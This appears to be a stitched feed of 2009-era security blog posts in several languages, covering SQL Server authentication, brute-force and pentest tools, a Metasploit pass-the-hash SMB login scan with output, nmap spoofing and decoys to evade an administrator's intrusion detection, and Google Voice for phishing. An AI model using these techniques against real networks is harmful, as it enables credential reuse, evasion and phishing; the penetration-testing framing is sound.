Just a quick post for my future reference on the differences between Trusted authentication and Mixed-mode Authentication used by SQL Server

Windows Authentication

• When a user connects through a Windows user account, SQL Server validates the account name and password using the Windows principal token in the operating system. This means that the user identity is confirmed by Windows.
• SQL Server does not ask for the password, and does not perform the identity validation.
• Windows Authentication is the default authentication mode, and is much more secure than SQL Server Authentication.
• Windows Authentication
  • uses Kerberos security protocol,
  • provides password policy enforcement with regard to complexity validation for strong passwords,
  • provides support for account lockout,
  • and supports password expiration.
• A connection made using Windows Authentication is sometimes called a trusted connection, because SQL Server trusts the credentials provided by Windows.

SQL Authentication

• When using SQL Server Authentication, logins are created in SQL Server that are not based on Windows user accounts.
• Both the user name and the password are created by using SQL Server and stored in SQL Server.
• Users connecting using SQL Server Authentication must provide their credentials (login and password) every time that they connect.
• When using SQL Server Authentication, you must set strong passwords for all SQL Server accounts.
• Three optional password policies are available for SQL Server logins.
  • User must change password at next login
  • Enforce password expiration
  • Enforce password policy
• SQL Server Authentication cannot use Kerberos security protocol.
• Supports environments with mixed operating systems, where all users are not authenticated by a Windows domain.

Source: http://msdn.microsoft.com/en-us/library/ms144284.aspx

ES: Las viejas técnicas nunca mueran y ataques de fuerza bruta contra autenticación de red no es ningún excepción.  Desde hace años existen este tipo de herramientas como pueden ser Brutus y HTC Hydra además es bien sabido que los “malos” han desarrollado sistemas masivos para realizar estos ataques en Internet a gran escala.

Ahora tenemos una nueva e interesante herramienta llamada Ncrack desarrollada por ithilgore y Fyodor el autor de Nmap. Es por eso que Ncrack sigue la misma línea que Nmap a lo que interface y comandos se refiere y nos permite realizar ataques de fuerza bruta a una velocidad de vértigo!!!

Por el momento está limitado a pocos protocolos como son Telnet, FTP, HTTP Basic y SSH pero son un buen comienzo

Además de la velocidad tiene otras características interesantes como son:

• Salva la sesión y poder continuar en otro momento
• Compatibilidad con Nmap
• Trae unas listas de las contraseñas más comunes
• Fácil desarrollar nuevos protocolos

Examinando los listados de contraseñas podemos ver las típicas y contraseñas reales basadas en “hackeos” de myspace, phpbb y Hotmail.  Tranquilo que mis contraseñas no están

Desde luego una herramienta para tener en la caja de herramientas cuando tengas que realizar un test de intrusión.

Ncrack

 US: Old techniques never die and brute-force against network authentication is no exception.  For years there have been such tools as Brutus and HTC Hydra and is well known that the “bad guys” have developed massive systems to perform these attacks on Internet at a large-scale.

We now have an exciting new tool called Ncrack developed by ithilgore and Fyodor Nmap’s author. This is why Ncrack follows the same style as Nmap regarding interface and commands and allows us to perform brute-force attacks at a speed of light!!!

Is currently limited to few protocols such as Telnet, FTP, HTTP Basic, and SSH but is a good starting point

In addition to the speed it has other interesting features such as:

• Saves session and continues at a later time

• Support for Nmap

• Brings a few lists of common passwords

• Easy to develop new protocols

Examining the password listings we can see common and real passwords based on 0wned of myspace, phpbb and Hotmail.  Don’t worry my passwords are not in the lists

Truly a tool to have in the Toolbox when you have to perform a pen testing.

Ncrack

– SRF

…And now, a rant.

What should be considered (and reported) as a vulnerability when auditing a network?

Is weak network architecture? What if i can hit a critical server from an unprotected workstation? Isn’t that a vulnerability? Can we detect it?

What are today’s vulnerability scanners doing to detect bad management practices? Users w/ local administrator? Admins in the same segment as untrusted contractors? Windows servers / workstations with the same password?

Isn’t that a vulnerability? (hint – pass-the-hash)

What are scanners doing to detect insufficient technical controls? In the face of current (phishing, malware, etc) threats, should lack of egress filtering and lack of a proxy be considered a vulnerability? Should automated tools be picking this up and pointing it out?

ESP: Un interesante movimiento estratégico por parte de ImmunitySec es incluir VisualSploit, herramienta para desarrollar exploits de forma visual y sin escribir código, dentro de CANVAS plataforma comercial de test de intrusión.  Este movimiento tiene 2 beneficios:

1. Ahorro de coste: La licencia de VisualSploit costaba $399 primer año y luego $150 / año y la de CANVAS cuesta alrededor de $3500 anual.
2. Al integrar las dos herramientas podemos escribir exploits de formas más rápida con VisualSploit y utilizarlos directamente en CANVAS.

Y para los que no se hayan enterado el próximo viernes 4 de diciembre ImmunitySec ofrecerá un Webcast de cómo identificar, escribir y utilizar exploits utilizando ImmunitySec Debugger, VisualExploit y CANVAS.

US: An interesting movement strategy on part of ImmunitySec is to include VisualSploit, tool to develop exploits visually and without writing code, inside CANVAS commercial penetration testing platform.  This movement has two benefits:

1. Cost savings: VisualSploit license cost $399 first year and then $150 / year and CANVAS costs around $3500 annual.
2. By integrating the two tools we can write faster exploits with VisualSploit and use them directly on CANVAS.

For those who have not heard Friday 4 December ImmunitySec will host a Webcast on how to identify, write, and use exploits using ImmunitySec Debugger, VisualExploit and CANVAS.

ImmunitySec
http://immunitysec.com/

VisualSploit Webcast
https://forum.immunityinc.com/board/thread/1076/visualsploit-webex-demo-friday-december/?page=1#post-1076

– SRF

ESP: Una de mis últimas adquisiciones es el telefoneo THC Magic con el sistema operativo Android de Google. Mi elección por este aparato es 1) por no tener un Ipod como todo el mundo y 2) por el potencial que ofrece. Tengo que confesar que estoy encantado y lo recomiendo.

Como no podía ser de otra manera  estoy investigando las posibilidades de usar el aparato para realizar auditorías wireless y la verdad es que tiene buenos programas para ello. Para sacarle todo el jugo al Android debemos desbloquearlo, privilegios root,  pero realmente no hace falta realizar esta accion si solo queremos identificar redes inalámbricas. En algunos foros se comenta la posibilidad de realizar inyecciones, podríamos romper las redes de forma activa, pero aun no he tenido tiendo de probar esto ya os mantendré informados.

Lo cierto es que  utilizo el Android como mi primera herramienta cuando estoy realizando una identificación de redes inalámbricas en una zona. En las redes abiertas podríamos conectarnos y realizar otras operaciones pero eso ya es tema de otro post.

Las aplicaciones que utilizo y están disponibles en Android Market son:

• WifiScanner: Un simple scanner que identifica las redes (abiertas, WEP Y WPA)
• Wardrive: Muestra las redes en un mapa usando Google Maps.
• WifiAnalyzer: Realiza un análisis del espectro inalámbrico y nos lo enseña gráficamente.

Otros programas interesantes pueden ser:

• WifiScan: Scanner de pago con buenas críticas.
• HiddenSSID Enabler: Nos revela los SSID oculto.

US: One of my latest acquisitions is the THC Magic phone with the Google Android OS. The reasons I did choice this device are 1) not having an iPod as everybody else and 2) the huge potential it offers. I must say that I am delighted and I strongly recommended it.

It could not be other way I’m investigating the possibilities of using the device for auditing wireless and the truth is that it has good programs to do so. To get the juice of the Android we must unlock it, become root, but in reality you don’t need to do this if you only want to carry out surveys of wireless networks. Some forums talk about the  possibility of performing injections, we could break networks actively, but I have not yet had the time to test this but will keep you posted.

The fact is that I use the Android as my first tool when doing wireless network recon in a zone. For open networks we could connect and perform other actions but that is a topic for another post.

Applications that I use and are available on Android Market are:

• WifiScanner: A simple scanner that identifies networks (Open, WEP and WPA)
• Wardrive: Samples networks on a map using Google Maps.
• WifiAnalyzer: Perform an analysis of the wireless spectrum and shows graphically.

Other interesting programs may include:

• WifiScan: Commercial scanner with good reviews.
• HiddenSSID Enabler:  reveals hidden SSID. 

so… you say you were able to grab LM / NTLM hashes from a windows box??? cool. now use them in the scanner/smb/login to check & see which systems use the same hashes:

msf exploit(psexec) > use scanner/smb/login
msf auxiliary(login) > info

Name: SMB Login Check Scanner
Version: 0
License: Metasploit Framework License (BSD)

Provided by:
tebo <tebo@attackresearch.com>

Basic options:
Name       Current Setting  Required  Description
—-       —————  ——–  ———–
RHOSTS                      yes       The target address range or CIDR identifier
RPORT      445              yes       Set the SMB service port
SMBDomain  WORKGROUP        no        SMB Domain
SMBPass                     no        SMB Password
SMBUser    Administrator    no        SMB Username
THREADS    1                yes       The number of concurrent threads

Description:
This module will test a SMB login on a range of machines and report
successful logins. If you have loaded a database plugin and
connected to a database this module will record successful logins
and hosts so you can track your access.

msf auxiliary(login) > set RHOSTS 10.1.1.0/24
RHOSTS => 10.1.1.0/24
msf auxiliary(login) > set SMBPass XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX (hash goes here)
SMBPass => XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
msf auxiliary(login) > exploit
[*] 10.1.1.6 – FAILED 0xc000006d – STATUS_LOGON_FAILURE
[*] 10.1.1.21 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.21
[*] 10.1.1.25 – SUCCESSFUL LOGIN (Windows 5.0)
[*] Recording successful SMB credentials for 10.1.1.25
[*] 10.1.1.29 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.29
[*] 10.1.1.28 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.28
[*] 10.1.1.31 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 1)

To speed it up, set THREADS > 1. Be careful not to set it too high:

[*] Error: 10.1.1.189: ActiveRecord::StatementInvalid SQLite3::BusyException: database is locked: INSERT INTO “hosts” (“address”, “name”, “comm”, “os_lang”, “mac”, “os_sp”, “arch”, “os_flavor”, “address6″, “os_name”, “desc”, “created”, “state”) VALUES(‘10.1.1.189′, NULL, ”, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, ‘2009-11-06 10:48:09′, ‘unknown’)

Thanks to tebo for the excellent work. Now, if only it worked with credcollect.

PenTBox, es una Suite de seguridad orientada a Pentesting y programada en Ruby, licenciada bajo GNU GPL3. Esta Suite es multiplataforma aunque fue pensada para entornos GNU/Linux. Está estructurada en un conjunto de programas que pueden ser ejecutados de forma individual (con independencia de la Suite) lo que permite la integración de nuevos desarrollos que aporte la comunidad de desarrolladores.

La Suite incluye las siguientes funciones:

• Cracking de los algoritmos hash MD5, SHA1, SHA256 y SHA512 mediante fuerza bruta numérica.
• Creador rápido de Honeypots.
• Generador de contraseñas seguras ante ataques de fuerza bruta y diccionario.
• Generadores de tráfico masivo en la red para probar posibles denegaciones de servicio.
• Escaneo de puertos.
• Otras aplicaciones complementarias

PENTBOX WEBSITE

MAS INFORMACION

fuente: securitybydefault.com

]]> http://securitythoughts.wordpress.com/2009/08/26/sql-injection-in-stored-procedures/ Wed, 26 Aug 2009 12:08:19 +0000 Wasim Halani http://securitythoughts.wordpress.com/2009/08/26/sql-injection-in-stored-procedures/

My colleague Dhiraj Ranka wrote about a very interesting topic of SQL Injections.
Though Stored Procedures provide certain protection from SQL injections, an improper implementation voids all such protections.

Dhiraj has demonstrated an SQL injection in a Stored Procedure which has not been constructed properly.

The crux of the issue lies in using the system Stored Procedure sp_executesql which takes a string as parameter and executes it. The string is generally a SQL query. So the entire premise of using stored procedures to prevent query injections fails as the input is directly inserted into the SQL query.

Read the detailed example at http://dhirajranka.wordpress.com/2009/08/25/sql-injection-stored-procedure/

Another interesting account of improper usage of Stored Procedure is demonstrated at
http://palisade.plynt.com/issues/2006Jun/injection-stored-procedures/

Regards,

For More Information : http://www.axoss.com/Services/Secure_Network_Design.asp

SECURE NETWORK DESIGN is IMPORTANT PROCESS which must be performed before the establishment of a new telecommunications network or service.

At the HEART of successful organizations is EXCELLENT Information network INFRASTRUCTURE.Often network design is not given SUFFICIENT FOCUS which can result in more EXPENSIVE CAPITAL and running costs, or the network needing constant modification during its lifetime.
AXOSS SECURE NETWORK DESIGN service CAN HELP your organization:

* IMPROVING your network EFFICIENCY

* REDUCING your network COMPLEXITY

* ENHANCING your network SECURITY, availability and reliability

* HELPING you keep up with the LATEST TECHNOLOGIES and new-business needs

Following are some of the Secure Network DESIGN SERVICES offered by Axoss:

* BUSINESS CONTINUITY Architecture Designing

* FIREWALL Architecture Designing Service

* PERIMETER DEFENSE Designing Service

* ROUTERS ARCHITECTURE Designing Service

* VPN ARCHITECTURE Designing Service

* WIRELESS NETWORK Architecture Designing Service

* REMOTE ACCESS Architecture Designing Service

As an INDEPENDENT ADVISOR to our customers, we leverage our BEST PRACTICE based METHODOLOGY to deliver Infrastructure consulting service.

New versions of nmap now displays TNS listener versions.

C:\msf32>nmap -sV 192.168.0.1
Starting Nmap 4.76 ( http://nmap.org ) at 2009-07-01 12:21
Interesting ports on 192.168.0.1:
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 2003 microsoft-ds
1047/tcp open unknown?
1521/tcp open oracle-tns Oracle TNS Listener
MAC Address: 00:0C:25:2C:0E:4C
Service Info: OS: Windows
…
Nmap done: 1 IP address (1 host up) scanned in 42.32 seconds

C:\msf32>nmap -sV 192.168.0.1

Starting Nmap 4.90RC1 ( http://nmap.org ) at 2009-07-01 12:40
Interesting ports on 192.168.0.1:
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 2003 microsoft-ds
1047/tcp open oracle-tns Oracle TNS Listener
1521/tcp open oracle-tns Oracle TNS Listener 11.1.0.6.0 (for 32-bit Windows) <–version info
MAC Address: 00:0C:25:2C:0E:4C
Service Info: OS: Windows
…
Nmap done: 1 IP address (1 host up) scanned in 35.35 seconds

Source: carnal0wnage.attackresearch.com

¿Cansado de tu monótono trabajo? ¿pensando en convertirte en un hacker ético? ¿quieres formar parte de la comunidad underground? ¡¡Ahora ya puedes hacerlo con este Kit que proponemos y que podrás pagar en cómodas cuotas de 99,9€!!.
No.
Lo sentimos pero desgraciadamente no tenemos tienda online y no vendemos nada.

Por si os puede servir para adquirir o solicitar nuevo equipamiento, hemos recopilado una pequeña lista con lo que consideramos el hardware ideal para realizar tests de intrusión y otras actividades propias de un profesional en seguridad. Muchas de ellas opcionales y aquí, cada uno se haga la suya propia

1. PORTATIL: por supuesto es el elemento más importante y vamos a remarcar algunos puntos a tener en cuenta antes de seleccionar cual comprar:

• Wifi: importante que la tarjeta integrada tenga compatibilidad con herramientas como Aircrack.
• Smartcard: poco a poco se hace más uso de las tarjetas inteligente como el propio dni electrónico, por este motivo es esencial que nuestro portátil tenga lector de smartcards, ya sea integrado o externo.
• ExpressCard, será necesario para ampliar el portátil con otra tarjeta wireless, un modem 3G o cualquier otro accesorio que pueda ser necesario.
• USBs: no, 2 USB no son suficientes, 3 son justos y con 4 empezamos a entendernos.
• Tarjeta Gráfica: Si pensabas que no encontrarías excusa para pedir una tarjeta gráfica potente, nosotros tenemos una. Usando la GPU de las placas con soporte CUDA se es posible optimizar el rendimiento en algunas aplicaciones de fuerza bruta. Recomendado GeForce 8800 en adelante, como un buen quakero.
• Bluetooth: imprescindible para conectar con el móvil, un GPS, hacer análisis de seguridad de bluetooth y algunas cuantas miles de cosas más.
• Bateria adicional: sobre todo será necesaria para los análisis de seguridad wireless, donde pocas veces podremos conectar el portátil a una toma de corriente eléctrica.
• Hyper-V: hoy en día ejecutar máquinas virtuales es lo más común, si nuestro equipo soporta esta tecnología garantizaremos el mejor rendimiento en virtualización.
• TPM: interesante para usar algunas soluciones como BitLocker.
• Módulo 3G/HSDPA: si tiene el módulo para este modem, nos ahorraremos usar el móvil o un modem externo, ganando algo en comodidad. Las tarifas más interesantes son de Yoigo y Simyo.
• Compatibilidad: no estaría de más comprobar que no existen “problemillas” de compatibilidad con Linux.

2. ANTENA WIFI: si estás pensando que aún puedes salir a auditar con tu antena pringles, la respuesta es NO al igual que no deberías usar hombreras. Puedes comprar una antena wireless que sirva para mejorar la ganancia de tu adaptador, como por ejemplo, una antena Yagi

3. TARJETA ADICIONAL WIRELESS: a la que puedas conectar la antena, hay tarjetas USB que tienen integradas potentes antenas y son desmontables para utilizar otras externas. Un chipset que permite jugar cómodamente es RTL8187L o Atheros. Si tenemos presupuesto (mucho), AirPcap es la tarjeta mejor soportada en Windows para todo tipo de herramientas.

4. GPS: ya sea USB o Bluetooth, es muy útil para mapear puntos de acceso en grandes localizaciones durante una auditoría wifi. Sirf suele dar buenos resultados.

5. CADENA DE SEGURIDAD: si vamos a dejar solo el portátil en nuestra ausencia, este tiene que tener un buen cierre, que nos asegure que cuando volvamos el portátil siga donde lo dejamos.

6. FILTRO DE PRIVACIDAD: para evitar el famoso “sniffing over hombro” tan habitual entre compañeros y mirones que se sientan a nuestro lado en el avión.

fuente: securitybydefault.com

Update 1: 15th July, 2009 – Anti-Sec has struck again. It seems they’ve launched a campaign against Full-Disclosure ! Imageshack.us was the latest victim. This time too they have kept the logs, which shows a vulnerability in lighthttpd

Astalavista.com, the ‘Hacking Security Community’ was recently 0wned, literally, by an underground hacker group Anti-Sec. The interesting thing about this attack was that the hackers posted their entire ‘attack log’ online. Leaving out some crucial details (like the 0day which they used to initiate the attack) they demonstrated the inherent weakness of the human mind. Though the attack was personally motivated, it serves as a good learning ground for beginners in the security field…what and where mistakes may occur.

For reference purposes, I’ve added the entire attack log of the Astalavista.com attack here.

So what are the lessons learned from this real-world example

1) You’re never safe from 0-day exploits. Even though it seems that the guys had patched their systems, the anti-sec people were able to launch a script and exploit their ‘LightSpeed’ web server to obtain a shell.
The contents of the script have not been disclosed and it’s speculated that the issue was certainly with LightSpeed which is based on the Apache software.
Interestingly, the shell returned had the ‘apache’ user privileges which allowed the attackers to read almost any file on the system. Note that the user ‘apache’ is not given a default ’shell’ (check /bin/false), but I believe the ‘g0tshell’ had a shell payload.

2) The owners at Astalavista ‘did’ have some sort of password complexity for much of the users. But the issue lies elsewhere. The attackers were able to obtain plain-text passwords to FTP servers and DBs via configuration files and backup scripts

3) Encrypt your passwords before storing it in the databases. As can be seen in the logs, the users of the database did not encrypt their passwords before storing their passwords there. This requires proper configuration at the database application end.

4) DON’T type passwords onto the command line. The attackers were able to obtain a password to a MySQL database by listing the .bash_history . This file contains all commands typed into the bash prompt after every session (the current session is stored in the RAM). So it becomes necessary to avoid typing passwords into the command prompt. Rather, the server should throw back a password request where the user should type his password. Else expect yourself to be owned by any Tom, Dick and Harry who can view the .bash_history file.

5) Following to the previous point, it is prudent to regularly ( maybe after each session) clear your .bash_history file. Check here for pointers.

6) Anything else ??….right now I’m just able to recollect these points from memory. I might update this later I anything new comes up.

Apparently, when the Astalavista guy started looking around for the people who caused them such damage ( after loosing their databases and backups to rm -rf …. I doubt they could be hurt more) the Anti-sec group unleashed their wrath on him( Glafkos Charalambous AKA nowayout) too.

Check out his attack log too. (Damn ! These guys are good at maintaining logs )
Funnily, Glafkos has an interesting way of generating his password, he uses the name of the service first, followed by a sequence of characters $#@!
Eg. For his Milw0rm database, he has the password as milworm$#@! and so on.
This was the beginning of him getting completely owned. Once they were able to guess this pattern, they went in for his Gmail account which they say had the password as gl4fk05$#

So, that was the end of his story, he too lost all his databases and backups and also lost his mail account.

I hope it is understood that I do not condone such hacking activities. This post was just for educational purposes. As can be seen, we did learn a lot !!

Safe browsing

-WasHal

This simple trick will give let you see if an host is getting much traffic running on, or is an idle machine lost in the network, this can be useful to use with nmap idle scans or even to see if the fat guy is connected over SSH/RDP (yep, this little bitches generate a lot of traffic)!

We will use hping3 to do the job! But before lets talk about the IP ID. The IP ID is an integer  number that is incremented each time a packet goes out of the network interface. following this logic we can remotley detect machine activity! Let’s see it in pratice

the host that we want to check is 10.0.0.1

[root@pwnagelabs]# hping3 -1 10.0.0.1 -i 3 -c 2

HPING 10.0.0.138 (eth0 10.0.0.1): icmp mode set, 28 headers + 0 data bytes
len=28 ip=10.0.0.138 ttl=64 id=39783 icmp_seq=0 rtt=4.2 ms
len=28 ip=10.0.0.138 ttl=64 id=39784 icmp_seq=1 rtt=6.3 ms

As you can see after 2 seconds (-c 2) the IP ID was only incremented  by one (id=).. so we can supose that this machine is idle in the network, and probably no one is accessing it.

NOTE: Many operating systems have patches that random this numbers (for example grsecurity for linux), so you should not trust in what your eyes see!

In this post i will write about a pretty nice feature of nmap, the Decoys!

So, what the phuck are nmap decoys?

Nmap decoys allows you to scan an host/network without turning you in front of the attack. Let’s imagine the scene, we are on a local network (this works also over the Internet) and there is a server host that we want to scan, however the admin is a paranoid fat guy that has a big plasma screen dumping all the snort/scanlogd logs into his eyes in real time!

nmap, have an interesting feature (-S) that allow us to spoof our source address, but when you spoof your source address the packages returned from the server host will also be sent to that spoofed address and you won’t see the result of the scan. But you can make as many scans as you want with spoofed addresses with one of that addresses as your real address!

In pratice something like this:

SERVER (10.0.0.1)

ATACKER (10.0.0.2)

DUMMY1(10.0.0.3)

DUMMY2(10.0.0.4)

[root@pwnagelabs]# nmap -S 10.0.0.3 10.0.0.1

[root@pwnagelabs]# nmap -S 10.0.0.2 10.0.0.1

[root@pwnagelabs]# nmap -S 10.0.0.4 10.0.0.1

Now the fat guy will see the scan coming from 10.0.0.3, 10.0.0.2 and 10.0.0.4, but which of thoose is the attacker IP? Well is one of thoose 3! Imagine that you want to spoof 100 addresses, will you run 100 scans and wait for each result? No dude, that’s where Decoys comes in, when you use decoys (-D, read the nmap manpage) nmap will do  a “multiple” scan, each one with its own spoofed source address  and scan the server host in parallel!

[root@pwnagelabs]# nmap -D 10.0.0.3,10.0.0.2,10.0.0.4 10.0.0.1

NOTE: Remeber to use decoy hosts that are up and running(one host alive when all others are down is supiciuous),it’s possible to defeat Decoys, especially if you are in a local network, a simple reverse ARP,HOP count (even scanlogd when your real IP is the last one in the decoys list) will catch you!

I deal with infrastructure and application security testing on a regular basis. On the infrastructure/network side, the consulting and testing market is much more mature, definition of pentest and vulnerability assessment are industry accepted. It is easy to communicate with other folks about the work involved. On the application side, things are not as well defined. It will be at least a couple more years before the definition or an “application pentest” is accepted.

What is vulnerability assessment?

According to Wikipedia, “A vulnerability Assessment is the process of identifying, quantifying, and prioritizing (or ranking) the vulnerabilities in a system.” In short, it involves anything to determine if there is a weakness or vulnerability in the system subjected to the assessment, then report on it. For application testing, you would throw some test input at the application or try a number of test cases and see if it is vulnerable to any of the vulnerabilities you are testing for.

In general real world terms, the tester for a VA (vulnerability assessment) is expected to perform the reconnaissance phase which allows the tester to understand the application well enough and determine if there are any short cuts to compromising the system. Also, gathering enough data about the application (such as platform it is running on or what other virtual hosts are running) to allow later testing phases.

Then, the tester is expected to map out the application and understand the application flow and relationship between objects in the application. Some of the vulnerabilities such as business logic flaws may also be revealed at this phase. Following mapping is the discovery of vulnerabilities, for input related flaws it might involve automated tools and manual validation test. There are also various other test cases that need to be manually test,  especially on the session related and access controls related flaws that are not easily automated.

In general, testers follow a common testing framework such as the OWASP Testing Guide, to ensure sufficient coverage of vulnerabilities during the process. After the discovery, the vulnerabilities are evaluated and usually manually verified again. Then a risk rating is given to each vulnerability to be included in a report.

Running a vulnerability scanner against a web application is a form of vulnerability assessment. It is also a form of assessment that is not very complete or thorough, in general, an automated scanner covers about 50-70% of the vulnerabilities in a given application.

What is penetration testing?

Penetration testing or “pentesting” includes all of the process in vulnerability assessment plus an important extra step, which is to exploit the vulnerabilities found in the discovery phase. You may ask, “Just a one step difference?” Pretty much, but this one step could separate the boys from the men. I often tell the students in my pentest class that it is common for a pentester to spend 20% of his/her time locating a single vulnerability and then 80% of the time is spent exploiting that vulnerability. The process of exploitation usually involves a lot of trial and error and may not work the first time. Depending on the type of vulnerability being exploited, some other system general knowledge maybe required to aid the exploitation process.

The better pentesters don’t usually stop at exploiting one single vulnerability. For example, a single CSRF vulnerability can be somewhat limited, bundle that with a XSS vulnerability and you have a much bigger problem at hand. In a lot of cases, an expert pentester can leverage two or three low to medium  risk vulnerabilities and turn the result into a critical exposure.

The added benefit of a pentest is able to see the vulnerabilities being put into active exploitation and show the actual maximum effect.Due to the nature of pentesting, the exploitation does not really have any established framework. The exploitation is highly dependent on the skillset of the invidual/team performing the test.

An example to show the difference

Let’s use an example to illustrate the difference. Let’s say the tester is testing for SQL injection and a single quote (‘) is put into all input field. In a particular field, when a quote is put to the field, a SQL error is generated in the resulting page like this, “You have an error in your SQL syntax near ‘\’0′ at line 1″  This is tell-tale sign of error SQL injection. A vulnerability assessment might just do a bit further validation such as trying to dump current user name to validate the vulnerability and then goes into reporting.

A pentest on the other hand would likely be taking a lot more time on this error alone. The pentester would figure out how to tag on extra logic or command structure into the current SQL statement so that the tester can control the SQL database. If possible, the tester will enumerate the database structure and possibly dump the whole database content. If the permission is not set properly, the pentester may also be able to jump into OS command context and start executing commands in the OS. Obviously, all these attacks requires patience and takes a lot of time to succeed.

What’s more popular?

If there is such as difference and pentesting is so much more in demonstration, why don’t we just do pentesting then? Well, there is always a costing difference making pentesting significantly more expensive than a vulnerability assessment. In fact the market is currently leaning towards pentesting; those who are concerned about web app sec are willing to spend the money to get what they think is the best. (cost more, it must be better)  In the next few years, as the general public are more educated about security testing for web applications, I am sure the market will adopt both services – vulnerability assessment and penetration testing. Until then, I have to be very careful about listing requirements and looking at quotation for security testing consulting work.

Probably you have seen the news, and saw too many different attacks, cyber attacks between US and China, now china is showing a new OS, Kylin!, Kylin seems to be an unpenetrable OS and is being installed in the main China gov servers as well as the military servers.
The US is now working is see what is this OS actually doing, what kind of security it has?, etc.

Is this the start of a biggest cyber warfare? , I think that it has started already, and this is just a couple of additional things that they found on the way.

The Kylin is already at internet, too many ftp sites shows the IOS’s ready to download, this is curious because if this is an top-secret project, I don’t see why it is available for its usage, I am about to test it and create a report about it.

Maybe a trick, maybe not, let’s see what’s there.

Regards,

Marco,

DO NOT DO THIS IN THE OTHER PEOPLE NETWORKS !
I HAVE MY LAB TO DO THE TESTS HERE !
THINK ABOUT WHAT YOU WILL DO WITH THIS INFORMATION.
YOU CAN BE ARRESTED !

In this tutorial you’ll learn how to capture the LAN packets and use tools.
You’ll see the important function of a firewall in a security system.
No more words, let’s start:

Topology:  One Linux (backtrack4) and one Windows XP.

You’ll need: backtrack4 cd rom or pendrive, a windows machine, a network conection. Internet conection is a plus.

boot up the backtrack4 machine, use user:root password:toor. Type startx to up the X server, when KDE is loaded open a terminal.Follow the images:

1. # ifconfig eth0 up -> setting up your network interface
# dhclient3 eth0 -> taking a IP address using the DHCP Network Server ( in my LAN i have a DHCP Server if you dont have a DHCP server you can just take an IP to your interface using “ifconfig eth0 192.168.1.102″ for example )

2. Open the wireshark network tool

3.Select dont show again and click OK

4. Click in the show tthe capture options button:

5. Enable Display Options and Disable Name Resolution, click Start:

6. in the console, do a ping in your gateway:

PS: after 2 packets type ctrl+c to cancel the ping loop

7. wireshark: select the SECOND ARP PACKET, click in the mouse position ( see the image ) to go to step 8.

The next step I’ll show in the Part2.

You’ll able to edit the IPv4 Packet and manipulate the information in the hard way!

O BlueMaho é uma suite de tools para Security Assessment em dispositivos bluetooth (celulares, pdas, smartphones, etc). Ele possui uma interface gráfica muito bacana ajudando muito na utilização e na execução dos testes. Este projeto foi concebido como freeware e opensource, sendo praticamente todo escrito em python, usando wxPython para a interface gráfica sendo assim muito leve e rápido para carregar.

Ele pode ser utilizado tanto como plataforma para Security Assessment em dispositivos bluetooth, fazendo varreduras a fim de localizar vulnerabilidades conhecidas, como também uma plataforma de Vulnerability Research pois utilizando as diversas ferramentas que ele acompanha aliadas as estatísticas que ele produz, muitas falhas novas podem ser encontradas. Vale a pena citar que as estatísticas são um ponto alto na ferramenta.

* Scan de Devices: Exibição de informações sobre o dispositivo como SDP records, fabricante e etc;

* Device Track: Mostra onde e quantas vezes o dispositivo localizado foi detectado e possíveis mudanças de nome;

* Loop Scan: Faz varreduras continuas a procura de novos dispositivos no range de ação bluetooth;

* Gera alertas sonoros sempre que um novo dispositivo for identificado;

* On_new_device Events: Possibilidade de especificar comandos que serão executados sempre que um dispositivo novo é detectado;

* Multi-Dialogs: É possível utilizar diferentes dialogs para efetuar tarefas distintas, facilitando assim a interação com diversas ferramentas simultaneament.

* Envio de arquivos:  Possível efetuar upload de arquivos para dispositivos acessados;

* Permite alterar o perfil de dispositivos HCI Locais (nome, class, BD_ADDR, etc);

* Possibilidade de guardar resultados de testes em databases;

* Security Assessment em dispositivos remotos a procura de falhas conhecidas (veja sessão de exploits para maiores detalhes);

* Possibilidade de testar dispositivos remotos a procura de falhas não conhecidas utilizando combinações de ferramentas disponibilizadas pelo toolkit;

* Temas: Você pode custimiza-lo eheh

Documentação Aqui.

Download Aqui.

Espero que gostem.

Good Hacking for All.

]]> http://aplawson.com/2009/04/22/pentest-sticky-keys-sethcexe-vulnerability-in-2003-xp-vista/ Wed, 22 Apr 2009 16:36:41 +0000 aplawson http://aplawson.com/2009/04/22/pentest-sticky-keys-sethcexe-vulnerability-in-2003-xp-vista/ http://hexesec.wordpress.com/2009/04/20/google-voice-was-grand-central-is-a-pentesters-best-friend/ Mon, 20 Apr 2009 22:47:14 +0000 jcran http://hexesec.wordpress.com/2009/04/20/google-voice-was-grand-central-is-a-pentesters-best-friend/

Google Voice turns out to be really handy for phishing attacks. When you send out a phishing email, it’s useful to include a phone number, in case of any issues with the attachment, link or other payload.

Google voice gives you a (new, anonymous) number which you can route wherever you’d like (cell, office, etc). Additionally, you can configure your voicemail to quickly impersonate the local admin, or security officer.

The killer feature, however, is the voicemail recording and transcription. Never again do you have to wade through a voice-driven mail system. Now, it simply dumps into your inbox for easy inclusion into a report. Additionally, you can download, email and share (via unique URI) voice messages.

Good for demonstrating that you can’t trust links AND phone numbers.